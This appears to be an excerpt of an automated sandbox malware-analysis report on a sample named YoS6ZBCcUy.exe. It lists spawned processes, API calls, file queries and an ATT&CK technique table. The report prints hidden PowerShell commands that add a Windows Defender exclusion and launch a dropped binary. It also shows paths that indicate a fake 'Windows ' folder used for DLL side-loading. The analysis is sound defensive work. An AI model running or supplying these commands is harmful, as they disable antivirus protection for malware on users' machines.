Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; $bginfopath = join-path $targetpath 'bginfo.exe'; start-process -filepath $bginfopath -argumentlist '/nolicprompt /timer:300' -workingdirectory $targetpath -windowstyle hidden; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\nsis" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadoaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaabcaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9E514 LocalAlloc,LocalAlloc,CreateWellKnownSid,CreateWellKnownSid,memset,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,LocalFree,LocalFree,19_2_00007FF780F9E514
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD73DC AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetLastError,GetLastError,19_2_00007FF780FD73DC
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..\..\third_party\webrtc\modules\desktop_capture\win\window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman..\..\third_party\webrtc\modules\desktop_capture\cropping_window_capturer.ccWindow no longer on top when ScreenCapturer finishesScreenCapturer failed to capture a frameWindow rect is emptyWindow is outside of the captured displaySysShadowWebRTC.DesktopCapture.Win.WindowGdiCapturerFrameTime..\..\third_party\webrtc\modules\desktop_capture\win\window_capturer_win_gdi.ccWindow hasn't been selected: Target window has been closed.Failed to get drawable window area: Failed to get window DC: Failed to create frame.Both PrintWindow() and BitBlt() failed.Capturing owned window failed (previous error/warning pertained to that)WindowCapturerWinGdi::CaptureFrameWebRTC.DesktopCapture.BlankFrameDetectedWebRTC.DesktopCapture.PrimaryCapturerSelectSourceErrorWebRTC.DesktopCapture.PrimaryCapturerErrorWebRTC.DesktopCapture.PrimaryCapturerPermanentErrordwmapi.dllDwmEnableComposition..\..\third_party\webrtc\modules\desktop_capture\win\screen_capturer_win_gdi.ccFailed to capture screen by GDI.WebRTC.DesktopCapture.Win.ScreenGdiCapturerFrameTimedesktop_dc_memory_dc_Failed to get screen rect.Failed to create frame buffer.Failed to select current bitmap into memery dc.BitBlt failedScreenCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\cursor.ccwebrtc::CreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = `
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF7810A63C0 cpuid 19_2_00007FF7810A63C0
Source: C:\Windows \System32\winSAT.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,22_2_00007FF781019BA4
Source: C:\Windows \System32\winSAT.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,iswdigit,iswdigit,iswdigit,22_2_00007FF780FB2BC4
Source: C:\Windows \System32\winSAT.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,31_2_00007FF781019BA4
Source: C:\Windows \System32\winSAT.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,iswdigit,iswdigit,iswdigit,31_2_00007FF780FB2BC4
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs\NSIS VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs\NSIS\resources\app.asar VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\WinSAT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows \System32 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Programs\NSIS VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Roaming\NSIS\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows \System32 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Roaming\MyElectronApp VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Users\user\AppData\Roaming\MyElectronApp\version.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows \System32\winSAT.exe Code function: 19_2_00007FF780F9DA44 GetSystemTimeAsFileTime,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9DA44
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 111 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 Native API | 1 Windows Service | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 111 Input Capture | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
